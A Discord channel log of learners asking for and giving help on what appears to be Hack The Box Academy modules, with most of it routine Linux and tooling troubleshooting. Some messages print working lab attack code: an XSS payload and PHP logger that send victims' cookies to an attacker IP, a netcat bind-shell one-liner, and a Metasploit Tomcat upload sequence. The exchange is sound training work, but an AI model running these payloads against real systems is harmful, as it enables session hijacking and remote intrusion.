#modules

Hello, I need some help with a linux intro module. I am trying to find a path to a file. I have checked each folder with ls command but nothing seems to be popping up. what do I do?

I figured it out. Thank you!!

can someone help with the pioviting part in this question Submit the contents of the flag.txt file on the Administrator desktop on MS01 skill assesment 1 in AD module

https://tenor.com/view/meme-gif-24843255

Hey, im actually just searching for an good anti virus, is there anyone who can recommend me some please :o

Windows defender works just fine

Hi all. I'm new to this channel, HTB and python. Who can assist with the block 2 question on intro to python.. I don't understand why my answer is wrong. I input the following command: print(f'{num}') and in kali it executed it which means it should be correct.. Any advice is greatly appreciate, thanks in advance..

I suggest reading and following #welcome so you can see what the server is about

I-

What section?

Oh found it

Try the following command: pwd it should list the current path. hopefully that answers ur question but if not, sorry 🙂

You don't need to print(f'')

i dont think windows defender is enough since it has some bugs and is not able to detect malware as good as other anti viruses

My point is this channel isn't where to ask

#1024429874246590575

thanks, ill see what i can do. grealty appreciate it

Just print

You only need print(f'') if you're using strings of text alongside variables

okay 💗

the variable is {num}

No

Braces in printf tell python to interpret what's in them as either code or a variable and not literal text

The variable in the for loop is just num

is this the channel to ask for help on a module question?

Yes

Sweet! I am stuck on a question and I have no idea what the hay I am doing?

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

i even looked it up on google and it's not making sense to me

We don't necessarily need a preamble my guy

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

im stuck on this question

You should be able to find a forum post about this

I did on google but alot of the stuff they are talking about i dont understand. as it is in the module it is in didnt even talk about what cURL is at all

https://forum.hackthebox.com/t/linux-fundamentals-filter-content-filter-all-unique-paths-of-domain/270162

man curl

Curl sends a request to a remote host that does various things depending on what you specify

the default is a get request and it often will get the source code of the page you visit

Does anybody remember what module in the pentester job path was talking about using base64 for defense evasion?

Probably file transfer

Anyone who is working on the Introduction to Windows Evasion Techniques, feel free to DM me. We can chat about it. Been working on it for a bit.

lfi i think

Lfi is late in the path, but that involves payloads within the browser

I found it - it was in the "Transferring Files" files section of the "Getting Started" module for those interested.

thank you. I understand what you mean now, thanks!

I'm currently working through the Skills assessment in the Information gathering - Web Edition module. The third question, "What is the API key in the hidden admin directory that you have discovered on the target system?" leaves me very confused. I have found 2 subdomains, and tried running ReconSpider against the second subdomain I found, it starts with "dev" and for some reason my results.json file won't give me any results. I thought the API key might be in the results from using ReconSpider but it's not there. Any tips, tricks, suggestions are appreciated.

I have also tried using curl against the second subdomain that I found, but curl doesn't seem to work against this subdomain

when reading dynamic, there is a way to stop the execution stack it's annoying because I can't dump the right addresshttps://academy.hackthebox.com/module/113/section/2139##About

I was able to answer the last two questions of the skills assessment. But the third answer makes no sense to me, I am looking for the admin directory in the robots.txt file but I tried just looking up robots.txt in the browser and get a 404 error

what shall i do if my xfreerdp doesn't want me to connect properly at all, and i mean like it times out

restart box

im using my linux system

instead since it's more efficient 4 me

i added /timeout:99999 and it's still done the same thing

no, i mean restart the host

or change vpn region

times out after a bit, yeah i've like done everything

my vpn region is on the lowest ms possible

cant even complete shells and payload whilst it doing this

you won't find it in crawled output iirc

oh, actually im wrong, i think for that one you have to make sure you put the vhost in /etc/hosts before crawling with recon

Yeah I added the vhosts, both subdomains to the /etc/hosts file and was able to get the last two questions but the third question still has me stumped

go to ur browser and type the domain and then /robots.txt

I get a 404 error for the page when I do that

try other vhosts

with /robots.txt

Ok

I finally got the robots.txt file, but have no idea how to access a disallowed directory/page

robots.txt is just a suggestion

to robots
you aren't a robot

What do you mean??

@hard matrix

Ohhhhh I know what you mean

i mean, that robots.txt is just a suggestion to web crawlers "hey dont crawl this"
it being disallowed in robots.txt doesn't mean you cant access that directory

But I tried accessing the disallowed page from the browser and just got an error for some reason.

make sure your /etc/hosts subdomains are defined correctly
and try accessing that directory on the subdomains

Would curl be a good tool to get the answer?

Used Curl to get this. But tried to go to the moved location in the browser but no luck reaching the page

Figured it out!!

+1

Pentesting Job Path, Footprinting, MYSQL
Not sure why I can't connect from kali.
ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain

I'd advise a quick Google of the error message 🙂

I did no luck

i normally copy paste input and output on chatgpt

works from pwnbox

Could be there is a CA certificate missing from Kali that is present in Parrot then

not entirely sure, im thinking about just using parrot while doing this course since ive run into quite a few errors related to teh system

try --ssl-mode=DISABLED

kinda the 3rd or 4th issue ive had that "just works" on the pwn box

I just Googled the error message

Are you trying to put the password after the -p?

Second result

..but yes, this is likely due to a CA that is present in Parrot, that is not present in Kali

You don't need to put the password after -p

If you don't append it directly, it'll prompt for it

(which is for the best)

i use kali and never had that issue

This comes up as unknown variable

looking at the man to see if this is even a command

sounds like it's not

lemme try skip-ssl

What version of the mysql client is present?

..as that option was introduced in 5.7

skip ssl does work, uhh lemme see

mysql from 11.4.2-MariaDB, client 15.2 for debian-linux-gnu (x86_64) using EditLine wrapper

Ah, maria client

Yes, it’s true, it’s really a certificate problem

I know kali used maria but I thought they were pretty compatible between the two

Btw you don't need to use sudo for it

I'm looking at my notes and I did use a password there, but didn't need any special ssl parameters.

and to be totally transparent I am not just trying to "make it work" but trying to figure out whats going on with issues I keep encountering

Maybe try with the password

Or try putting -p last 🤔

ya ik and --skip-ssl does work

Also this "thread" is now here for future people who encounter this issue

--ssl-verify-server-cert¶
Enables server certificate verification. Prior to MariaDB 11.3, this option is disabled by default, otherwise enabled. Use --disable-ssl or --disable-ssl-verify-server-cert to revert to the pre-11.3 behavior.

from the mariadb most recent mysql client man

https://mariadb.com/kb/en/mariadb-command-line-client/#-ssl-verify-server-cert

...but yeah.. again, it's likely this is due to a CA or certificate missing in Kali that is present in the Pwnbox instance of Parrot

Since I have your attention, do you recommend using parrot while working through this course?

I think I would have run into that if that was the case, unless something changed with the module

I would like to minimize friction working on the course itself so I can focus on the content

Likely not a parrot thing, rather a pwnbox thing

Some config settings

Perhaps raise something in #1234357888114364508

You could just say you have issues connecting due to SSL verification under Kali, and link back to the start of this discussion

..if you don't want to type it all out

😄

What's happening here is that mysql is saying the server is using an unverifiable self-signed cert

Which I mean... yeah lol

If it helps you guys in anyway I'll make a post regarding it

Thanks

How is everyone's studies going? Haven't been here in 12 months or so.

is there some way to find where it’s moved? or something else i’m meant to do to get the key?

Stuck on the Live Engagement module of Shells & Payloads (115/section/1139):

||```
msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword Tomcatadm
msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 172.16.1.5
msf6 exploit(multi/http/tomcat_mgr_upload) > set LPORT 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOST 172.16.1.11
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit

Getting `Exploit aborted due to failure: unknown: Failed to execute the payload` after all this. Is there any way to get Metasploit to work properly here or does this *all* need to be done manually?

@smoky marten you're asking about the question about the new API key yes?

not the new api key, I found that one

ah

then it is on the w* subdomain

ik

I found the directory, but it gives 301 Moved Permanently and idk where to

use -L in curl

for it to follow the redirect

ohh ty

Was just going to say this.

I feel dumb now lmao

or just visit it in your browser (if you have the w* subdomain in your hosts file)

forgot it did that

btw your message that contained the subdomain was deleted, as the subdomain is meant to be found by you, so it's a spoiler

dude chill

i was resolving issue A first

alright sorry
figured it was good to just spoiler it but that makes sense

yeah you bumped your msg when like 4 other msgs were there lol.

i've had little luck with msfconsole and this module

like literally any time with the tomcat upload one it's failed for w/e reason

semi-related question, is there a way to get curl to display requested redirects without following them?

-I

see the header and usually 301 will tell you where it's going in the header

alright yea

that’s what I initially tried but it wasn’t in the header like usual so I got confused not knowing abt -L

Well I've tried to ||generate the .war file using msfvenom too|| — no dice there either. Perhaps there's a way to pollute the parameters, but Metasploit doesn't provide any documentation on what parameters they pass to their web shell to get the reverse shell to work — if they did, then it would be possible to use netcat to do what Metasploit can't. Alas, going to have to go back to an earlier section to see what happened to JSP because I had an issue that required reinstallation of Arch shortly after I was done with Getting Started, so all my notes from then are lost.

the manual method should work

make sure the LHOST= and LPORT= don't have spaces after

i.e. LHOST=<IP HERE> and LPORT=<PORT HERE> with no spaces

Update: got it.

Hey, brothers, should the academy’s startup range environment be optimized? I can’t open the laboratory.

At least 30 minutes

Hey

I’m looking for a friends to do bugbounty

probably a browser issue, try hard refresh/cache clear

this channel is about academy on htb, maybe try hacker lounge or something

verify yourself first and try other channels

i already tried

Can you add a mechanism? It has not started successfully for more than 10 minutes. Reset button

nah that would only happen if services are degraded for some reason

their site does say they're having issues today, so it could be related. https://status.hackthebox.com/

more likely something on your end though if no one else is having issues

this is a known browser issue that occasionally happens where the request gets stuck and doesn't actually forward to the backend

it's silly

Thank you, how to solve this?

https://tenor.com/view/thats-the-neat-part-you-dont-invincible-gif-27194608

sometimes changing VPN regions gets it to work

@fathom pendantIs there any discount on Black 5 CPTS?

Black 5?

huh?

Black Friday

I found that I couldn't open it for 2 hours today

Are you a premium user?

Broo I need a really good guide , can anyone please??

No, I'm just a Silver

Ohkiee

.

what help do you need

I'm bored now

The laboratory cannot be opened

I am a beginner and I am learning ethical hacking but I am confused ... What should I do and what not

Can you please give me a real wayy

Hey, good brother

You should try to break through the wall and try to use a browser to search for information

If it doesn’t work, go back to discord

Yes

after the Linus what should I start???

what is your problem

target taking literal years to spawn

Hahaha, yes, it is recommended to optimize

Otherwise, customers will have to go to tryhackme

literally never heard of Black 5

but if you're asking if HTB does black friday sales, no

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

It's Black Friday, sorry, I used the abbreviation

Bro i am newbie but i have good cybersecurity knowledge and networking knowledge, I want to learn how to hack

@royal mist ^

Will that work???

Hey bro, my lab hasn't started yet

you will be an advanced hacker tomorrow

33

Wait , I'll check it out

Always stuck on this page

I have switched 3 browsers

hard refresh, change vpn regions, try again

OK This is my second attempt at switching VPNs

terminate the pwnbox then refresh and change vpns

i've seen that particular issue

it seems to be related to trying to send the signal to terminate the pwnbox so it can set the reconfigured VPN

he has always been like this

The button does not work, pwnbox has stopped

weird

but yeah it's one of those things that you have to refresh the page after you terminate pwnbox

otherwise it still thinks it's spawned due to some caching

that was weird, my target server didn't spawn until i decided to start the pwnbox, it had been spinning for 30+ minutes, and as soon as i start the pwnbox it works

Hey man he started it and I crashed

i didn't do it i swear

Lol

if it's a continuous issue for you; reach out to support so they can take a look into what the cause may be

@novel lynx hey , from which I should start ?

you have to go and buy a better router first, can't be a good hacker without a good router

bro start from linux fundamentals if u have no linux experince

nah i've done some modules via tethering

i wouldn't recommend it personally

but it's possible

spite is powerful

I have a fine router , just tell me in the hackers Bible , what I should do first????

Start from the top

start with the beginning

You don’t read a book’s chapters as random

don't run before you walk

From Nmap? @fathom pendant

https://tenor.com/view/from-the-beginning-paul-karyakos-chefpk-from-the-start-from-the-top-gif-26878503

Linux Fundamentals bro

can't do shit if you don't know how your system works

Oh ohkie

I know linuxxx at intermediate level , but yeah I'll revise it once again

Did I understand correctly? source are the arguments that are sent to the web application and are temporarily saved in a variable in the browser's memory, and sink directly adds the given arguments to the page's DOM?

Thank you guys

https://medium.com/@fath3ad.22/understanding-dom-based-xss-sources-and-sinks-c17ae4bc7455

source is what takes the argument, sink is what displays the result

Hey guys! I'm going through the setup module of the HTB academy atm.

I'm reading through all of the content thoroughly but am not sure if I should personally be installing everything they are going through in real time too?

THe VM station, ParrotOS, VMware, Kali linux etc

You can use your own machine (kali, parrot os or any other) and configure the vpn from there, or simply use the pwnbox and everything will be configured from there

awesome! pwnbox it is

thanks @plucky hollow

Although I recommend you download Kali or Parrot in the virtual machine manager (Qemu, VirtualBox, VMware) that you like the most, configure OpenVPN and use the HTB VPN configuration file that you download if you want better performance.

what are everyone's thoughts on using GPT to help in your studies? for the most part i feel like i'm going to have access to GPT when i have a job in the field, so i feel like it's free game, just another tool

I like to use ChatGPT to bounce ideas off of, to sometimes build out some understanding of a bit of tech I've not used before, or to get some advice.

But

chatgpt is a powerful tool that can be very useful if you know how to use it

Don't take it at its word

It will get things wrong, and relying upon it too much will mean you become a prompt engineer

Not the thing you're studying for

😉

I use GitHub Copilot more, I think GPT is a good tool, but it also makes a lot of mistakes, it is more language-oriented than technical data-oriented, so it depends on how you use it.

(kinda joking, but I think it's a valid comment)

every mistake gpt makes is a learning experience though

If you can spot it yeah

most of the time i am unable to continue, so i know very quickly haha

🙂

also how am i supposed to know to type :wq to save a vim doc? gpt knows

nvim >

Having a "sidekick" is nice, but yeah.. I usually only use it to discuss random thoughts, to give an example of a starting point, or to try and explain a certain concept in a different way.

I am at section Skill Assessment in Windows attacks and defenses module.
When I RDP to the WS001, I can't login because "The trust relationship between this workstation and the primary domain failed.".

Please help

probably restart the target

unless you have DA powers then you can leave and rejoin the domain

I did twice, changed the VPN and the Pwnbox location too.

: (

When it asked you to trust the fingerprint, did you press yes?

Yes

it's an issue with the environment. if restarting didn't do it i'd open a ticket.

It's working now, nvm. I think I know the issue

This has happened to me before, Whenever you connect with parrot by mistake instead of kali, It messes up the trust relationship I guess. Idk why but it does. Then if you try to connect with kali, you have to reset a few times or wait for a long time.

smh not using vimtutor

vimtutor teaches you to zero --> hero your vim skills 🙏

i bet gpt could give me a great starting list of things to do in vim lol

vimtutor is literally a command that comes with vim installs

it teaches you the basics of navigating in vim

and handy shortcuts

like how a starts your insert after the current character, where i is before

It is true that when I ask the AI ​​about how specific tools work, although it always tries to give an answer that works most of the time, it does not tell you the best one.

Also, a lot of times it just improvises and starts making things up.

and this behavior increases progressively according to the complexity of the question

yep

as it's not a search engine

the answer given is likely based off some forum post that gave some half-assed advice

or you're solving an xyproblem

https://xyproblem.info/

^ this is a really good bit of read

there's a reason I nudge the question to it's root X problem instead of what Y is asked

especially if it seems odd

@quaint gate please refrain from posting screenshots of modules > t0; as well the Attacking Enterprise Networks module is done by many blind

Sorry , I figured that is in the actual module material

I jumped onto the pwnbox and struggled with the VMware installation. Is this because it's all already setup?

Ended up just downloading/ everything everything on my own local PC for now to keep myself rolling through the setup module

downloading/installing**

indeed the AEN module is the guide for it

you can't install vmware on the pwnbox

or at least you shouldn't be

the pwnbox IS already a vm

i thought so, thankyou for the clarification

tom was more saying you can either:

1. Set up a VM on your local PC

or 2. use pwnbox

ahhhhhh yes

you guys are so helpful, appreciate it

besides

even if you could get it working on pwnbox, it'd just wipe when you reset it

@royal mist i did not give consent to dm please read the #rules

I am sorry , I did mistake

just ask your question here:
Tips for getting your question answered;
Provide the module name - section name
Provide context on what you're having trouble with
Try and make sure your question hasn't already been answered by utilizing the search feature

Ohakyyy , thanku

hi, this is taking me a lot of time: python3 xsstrike.py -u http://94.237.53.xx:xxxxx/?fullname=hola&username=hola&password=hola&email=hola%40hola.hola

@vestal wing hi just a suggestion! adding a shebang to your ReconSpider.py (#!/usr/bin/env python) which should allow (with chmod +x) users to run the script without needing to specify python3 beforehand (just tested)

what module/section?

Cross-Site Scripting (XSS)

XSS Discovery

i don't recall XSS strike taking much time but I also didn't really utilize it too much

i have been like 40 minutes waiting

iirc there's some level of interactivity with it but also XSStrike isn't required to answer the questions

just do some manual testing to see if there's something you can manipulate

if it's taking a while do ctrl+c

I already have the answer but it bothers me that I can't do it myself.

¯_(ツ)_/¯

when automated tools don't work, manual will do the trick

open a PR

:p

It's not on gh

It's a direct download from academy

And panda is the one that wrote it :)

He meant Panda Request :p

Yeah... panda's tool isn't on gh... the ReconSpider on GH is different

Yeah true i was making a silly joke

Hey, I'm Doing some Linux fundamentals,
How can I use the find command and I want to find a .conf file that is between two size like 20k and 25 k

Can i just use the size command again?

like find ...... -size +20K -size -25k?

Yes, that should work

You can also specify the name. So something like -name "*.conf"

Thanks I got it.
I thought maybe there was a way to put like -size 20-28k or something

Nope

The -size flag only takes +/- afaik

So no ranges

Thanks much appreciated

Anyone for this section ?

I can’t dump the right memory yet I take the MAP -RW- but it can’t find an executable

The reading tells you explicitly which mem to dump for it, and yes it will match

Once dumped, you can run strings against it

The reason the screenshots and text is cutoff is bc it's exactly that way on the target

This section is, indeed, a guide

In x64dbg did you set the exit breakpoint?

yes I deactivated everything and left only the breakpoint option. the problem is that when I get to the card memory, as it's dynamic, everything moves, so I don't have time to dump a memory address.

when I use stings there is content but when I use the other de4dot tool it can't find the .NET header (so I guess MZ)

Hi mates, i hope you all well, i am trying to find the existing exploit in MSF for the https://academy.hackthebox.com/module/39/section/414 , someone have a hint for me, which service I should focus on and what database to use for searching the exploitname? Thanks in advance, to take your time for a newbe. Just found the answer(NT AUTORITY******), but we all know cheating is not the way!

Why am I not getting a remote shell?
https://academy.hackthebox.com/module/67/section/912

I'm trying to solve this windows server module in windows privesc

I should get a shell after running the command

instead I'm getting ntlm hash

Hi, I am having trouble with the htb academy module HTTP Attacks Skills Assessment. Can I DM anyone? Ty

What trouble are you having exactly?

Can I DM you?

sure

greetings, I have question question for Cross-Site Scripting (XSS) , section session hijacking.
I got my script.js: || document.location='http://10.10.15.105/index.php?c='+document.cookie;
new Image().src='http://10.10.15.105/index.php?c='+document.cookie; ||
and my index.php: || <?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?> ||

and I keep getting:

[Fri Aug 23 12:59:31 2024] 10.129.32.115:35772 Closing
[Fri Aug 23 13:01:07 2024] 10.129.32.115:35816 Accepted
[Fri Aug 23 13:01:07 2024] 10.129.32.115:35816 [200]: GET /fullname/script-tag-type

payload on web page is || (“><script src=http://10.10.15.105/script.js></script>) ||
I see that web page can get to script, and I also used many other payloads but non of them write me a cookie. I also tried to use port in script.js like IP:80/index.php but none works...

#cpts message

Looking at that log, I don't think it's getting the right resource from the server.
Your log should be saying something like GET /script.js with 200, not /fullname/script-tag-type

I cant get that response, I seems to me that web page cant get to script,js and index.php and I dont know how

I mean php server is running at dicetory where script and index are

Yup, I can see that, I'm not able to spot what's wrong from everything that you have shared to be honest, should have worked. I wonder what's wrong

I read that port could be the issue, but in materials no one mention port. Also I tried some combinations but no luck

There's some debugging that you could try, DM?

sure

I'm reading through the ACL Enumeration page in Active Directory Enumeration & Attacks and I'm a bit confused on how they concluded that the user was damundsen that wley has control over, did they use powerView to find out who the CN was mapped to or is there something in the output that suggested this that I missed

About the Identifying SSRF module in Server-Side Attacks, I looked at || the hosts file and found an internal endpoint. I could send a http request there succesfully, but I couldn't find the flag ||

Should I squint my eyes more?

Huh I solved it

The wording put me off

It was shown in bloodhound I believe

you can do that eithier by using bloodhound , or by powerview (in that case you need to read the output carefully )

In a lot of the modules they provide lines of powershell and bash for searching through files, are we expected to remember these lines of code or just have them written down for later use? They are explaining what these lines do but i dont really know powershell and bash too well.

yes, you are expected to take notes so you can refer to them later

sometimes this commands works sometimes not why?

the ! might do something

special character

@fathom pendant any idea?

what’s dynamic resolution

o display stuff maybe

enable dynamic resolution

check maybe if server is online

it is

/cert:ignore idk what that does but maybe

nope

or whack the cache/config data for xfreerdp in your home directory. I think its under ~/.config/freerdp in Kali (note, not xfreerdp). You can use find to figure it out if it's not .config.

Hey there, Working on the Web Fuzzing section in Academy. I need to find the flag file from http://IP:PORT//webfuzzing_hidden_path/. I have found the directory but all the word lists i run dont find any files/

IDK then, there was that cert error, but w/o validating the cert I just see that "timeout waiting for activation"

maybe it’s not a default port

no bro idk remmina works fine

here

Never mind found it kicks rocks Stupid challenges

Is this a spoiler?

@shut vapor lol no

any idea how can i transfer file here ??

i am using smb impackt but

any method??

You tried to make a /drive on your xfreerdp which allows you to map a directory of your machine

/drive:data,/home/youruser

Thanks to this you will be able to transfer the data from the remote file through the xfreerdp socket on your local machine

Have you tried password protecting your share?

^

timeout
Also add /cert-ignore

Evil-winrm has a built-in upload/download feature

1. Dont @ me, im not on demand
2. Also don't share the pw since you had to crack it, that's a spoiler

i have added timeout

rdp connection bro

Ah mb

But anyway

Oops sorry

Xfreerdp also has a /drive: feature

lol yet I told him ahah

Reminder here btw on that point, I'm not staff I just volunteer myself

ya but the thing is that i want to access other user in it and i can use runas and its working but i through drive when i am trying to access that user through GUI it asking for Admin pass

No

/drive:<sharename>,/path/to/directory/you/share
This mounts a directory with <sharename> on the computer

Under \\ts-client\sharename

It also works the other way around you can copy items both ways

Also you don't need to runas if you have the guy's password

Yes you need admin perms to mount the backup drive on the given host... but you can also mount it on your system

no like i rdp from a user account and now i do that rdp command with that path but here in that 1 found another user cred and now in that user there is a file i want to export

Yes... rdp with that other user's creds...

No need to do any silly runas

The first question in https://academy.hackthebox.com/module/31/section/599 asks about filetype, but every variation of answer is rejected, even after following the guided solution.

i cant thats the problem here bro

You should be able to?

I don't recall rdp being an issue with user 2

can you give the command you are running?

ok i copied it, now delete because spoilers

i'll test on my end, what section is this ?

That's a weird error that sometimes occurs with xfreerdp

tried to read up but a lot of in between noise xd

Password Attacks Lab - Hard

I assume in your post you redacted the rest of d* password

Because his pw definitely isn't 4 characters long

i dele that pass bec you said that spoiler

Yes

in this section someone managed to make the java executable work ? https://academy.hackthebox.com/module/113/section/2164\

Username is also a spoiler

guys i am in the beginnig of academy can anyone help me out?

Why are you putting it on your own machine?

Like the Java version on your machine doesn't match the Java version on the target

i am not understanding here how am i supposed to transfer that file in my system

The JRE on the target is 8.0.0 or something like that

I downloaded it from ftp and tried to run it on the remote windows.

My message about file transfer wasn't to you

Why?

It already exists on C:/apps

i can access the cmd of that user but when i try to send it saying error

to do the exercise?

ooooops

seriously ahahahahah

Try remmina to remote in with d*

no working that user cant rdp

it's not the same size so the file on the ftp is fake lol

means no rights

Yes they can lol

I've literally rdp with them

bruhh why cant it give me permission then

¯_(ツ)_/¯

remmina has functionality to transfer files? like xfreerdp?

just checked my notes look for other services that may be available since i'm assuming you didn't scan the host

that's why i don't recall having issues, didn't need to RDP

for transferring ??

yes

there's a port open on the target that you can connect to that has the file you're looking for

without the need for "runas" or any of that nonsense

scan the target with nmap

you'll see what I mean

rule 0 if the target is 10.129.x.x; never assume there's only the service mentioned on the host

always scan

please state your module, section and your problem. a nice touch would also to include what you've done so far

lol bro i check but i thought there would be a way to share the file as i can access the cmd of that user then you said rdp is ok lol i did finally

there are ways

File transfers covers that iirc

noo i dont think you can transfer in this case there are strict permissions

I was wrong. I misremembered, literally just checked my notes on how I did it

ah

There's a file sharing service running on the target

chill i was more dumb

Anyway

That's your path forward

i try taht but i try to make a share then ...

You don't need to make a share

he just gave you a solid tip

but can we transfer ? like there may be any way?

module 4 setting up

There's one already running

^^

ya oops

Just. Scan.

And connect

You have credentials

linux PAM

That doesn't help us help you

ya i did

maybe the link then, because i can't do much with that

Do you mean the question of "what does PAM mean"?

Google is your friend

Good then you should have access to the file you need 👍

ya thanks and sorry for tagging

Guys can anyone suggest me what shall I do basically I used to practice hacking daily at home but now I have to leave home and work rn iam around lots of people (my work friends) and I have to leave my setup back at home what shall I do??? 😭😭

Cope

It's ok to take a break from this shit dude

Let your mind rest and absorb knowledge

hi guys sorry for disorder, i'm on sqlmap essentials module, and i have not understand how can i recognize a suffix/prefix in a real-world scenario. Can anyone explain me that?

Any chance of HTB getting a distribution center in the US. I want to start buying swag but paying 30 in shipping for 10-20 in stuff is a bit much

Submit to /feedback

hi, I got stuck on question 8, I did both mimikatz lsadump:lsa /inject and also hashdump(meterpreter) to get sam, for the administrator the hash that I received was not suitable. I also did it via crackmapexec --lsa -local-auth, but did not get the necessary hashes (9 secrets received)

Module: Web Attacks
Section: Local File Disclosure
Link to section: https://academy.hackthebox.com/module/134/section/1204

What trick are they referring to here?

or attempt to utilize a hash stealing trick in Windows-based web applications, by making a call to our server.

guys so I'm on module windows evasion and to check on my own pc I forwarded port 8888 and listened with nc, suddenly I get an unknown IP connecting to me. Coincidence or a problem?

what are the steps to SSH?

The basic command is as follows:

ssh username@ip_address

It'll then prompt you for the password. If you need to specify the private key, use the -i option.

Thanks sooo much. i am really new to Linu

No worries. We've all been there.
Tip: check the man page for a tool/command or options like --help or -h.

They are probably referring to capturing the NTLM hashes. Which is why they say Windows-Based application.

But doing so with a call to the server? I don't believe that's been discussed so far in the CPTS path?

Also, it says "windows-based web application," so I was wondering if that had something to do with something from the browser?

https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/unc/ Here's something to read about but I've only done this on Network engagements where you upload it to the share. But, it says Windows Based web application, so the trick isn't far from proabably uploading the same thing to a web application hosted on windows.

But, tbh, it's a guess from me. That's what I can think of. Hope someone with more clarity can clear this up more

I see. Thanks for sharing. It's an interesting attack regardless.

Basically setting up a server for the victim machine to execute the payload and call back to

In windows, generally, when a machine attempts to access resources, it sends along its ntlmv2 hash

Or well, the user in-context

It's similar to how you may use xp..dirtree to capture a hash with responder

Are you still stuck?

An account you compromised may have admin access

Don't overcomplicate things

After you've tried some things, if you are still stuck you can DM.

So... would the server we setup have to be an SMB server? Either ways, I don't really get why they mention it when all they've discussed at that point is information disclosure. They're just beginning to discuss RCE, and executing a command like connecting to server (callback), is RCE.

Or am I missing something? 🤔

Well yes

But that's just referring to in context of windows

Indeed lfi might lead to rce

Hey all. It's been a while. Possibly dumb question here.
I used sudo -l to see what commands I can run as my current user. The response was I can run a script called user2
How do I run that? like what is the syntax?

you are allowed to run /path/to/file as (user : group)

Okay, how do I do it "as" user : group

like (user2:user2) /bin/bash?

using sudo

okay. I think I did it, but it says the user2 command isn't found. Dod I need ot do user2:user2?

sudo user2 bash tries to run some file called user2

check your syntax, and check the section regarding sudo (i believe it's the Privilege Escalation section)

kk

is there any point in reaching out to support about a module target not responding or should i wait til status is green again? https://status.hackthebox.com/

Got it! It totally was up in the text wall of China above it. thanks! @dim wolf ❤️

this is why you take notes, silly protoss

(this message was endorsed by the Zerg Hivemind)

Anyone able to assist with Web Fuzzing Virtual Host and Subdomain Fuzzing? I am unable to find the "su" suffixed subdomain

tbh i just switch vpn regions

what is your fuzz syntax

IIRC try using different wordlists in /seclists/DNS

DM'd

and yeah use HOST header FUZZ.inlanefreight.htb with ffuf for vhost enumeration

My issue is they say to use the subdomain 5000 one

which module you on?
i did this a few weeks ago maybe, but i remember needing to use fierce wlist for one of the vhosts

this is the web fuzzing module

the one slated to replace the ffuf module in the cbbh path

I'm in Password Attacks-Passwd, Shadow & Opasswd

I already moved passwd.bak and shadow.bak from Will, over to my machine.

I unshadowed both .baks

Now I can't get hascat or john to work.

Any help, please?

use hashcat locally from kali

thanks this fixed it!

Yes, that's what I did, as demonstrated in the module

what do you mean you can't get hashcat or john to work

^

is hashcat exhausting?

is it telling you "Token Exception"

Hi guys I am on the shell modules and I am having a little trouble on the bind shell part

here is the question

what's giving you trouble?

SSH to the target, create a bind shell, then use netcat to connect to the target using the bind shell you set up. When you have completed the exercise, submit the contents of the flag.txt file located at /customscripts.

refer to cheatsheet

repeating the question isn't helpful for us helping you

it helps us help you if you say what you tried

i managed to get a bind shell but when i type commands its just copying commands between the two shells

Nein! It's telling me No Hashes loaded.

I did:
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes mut_password.list

that's how nc works

but are you saying that it's not executing commands?

check format of unshadowed.hashes

i am trying to cd to custom scrips but nothing happens

yeah not executing commands

ok

did you do the shell as described in the section

yeah so what I did was I did nc -lvnp 7777 on the target host

and then i connected to it from my home shell

that's just telling it to listen, you're not piping any i/o to a shell command

I forgot to mention I added -o /tmp/unshadowed.cracked

Basically I used the same one disclosed in the module

so what do I do going forward?

because it did connect (listen) but when I try execute commands nothing happens

again

that's because you're not doing any piping

read the subsection titled "Establishing a Bind shell with Netcat"

what exactly is piping 😅

ok let me read that again

stuff like | 2&>1...

sorry, i'm not following -
No Hashes loaded. means that for the module you've specified with hashcat, it doesn't recognize the format of the hash you're trying to crack.

piping in simple terms refers to redirecting i/o to another command

so you should probably make sure that the 'unshadowed' hash you're trying to crack with the module is in the correct format

such as

cat file | grep "word"

from what I recall this section has been a bit silly with trying to load the list

https://www.gnu.org/software/bash/manual/html_node/Redirections.html @pine dune

trying fierce now, thank you

you can try just loading the root line into its own file and cracking it

yep you helped a few weeks ago with it
#modules message

this is the web fuzzing module yeah? fierce wordlist isn't required

practically every DNS wordlist used is a subdomains-top1million-*.txt

Its is the Web Fuzz Module yes,

literally ran it on my computer JUST NOW and got the su...inlanefreight.com subdomain

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l ip 7777 > /tmp/f

i put this command in my terminal but nothing happened

the ip is of the target

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f

this is whats given in resources for bind shell

you're giving ip, instead of an actual ip

think about what you're doing with a bind shell

it sounds like you're running this locally instead of on the machine you're intended to SSH into

yeah I did that to protect my privacy 😅 I did in fact put the real ip

but yeah I managed to figure it out

thanks guys @hard matrix @fathom pendant

np

good luck

Found answer

Keep your goop to yourself! I just got through the second part as well. I'm a hackin' master! Ignite your psi blades and begin to hack!

Regarding this I don't understand why the email field shouldn't be tested, couldn't the conditions simply be bypassed so that they are commented or something? Tip: We will notice that the email must match an email format, even if we try manipulating the HTTP request parameters, as it seems to be validated on both the front-end and the back-end. Hence, the email field is not vulnerable, and we can skip testing it. Likewise, we may skip the password field, as passwords are usually hashed and not usually shown in cleartext. This helps us in reducing the number of potentially vulnerable input fields we need to test.

Likewise with the password

if there is adequate input validation and sanitization, it's a parameter you can't really test because your input will be sanitized

^

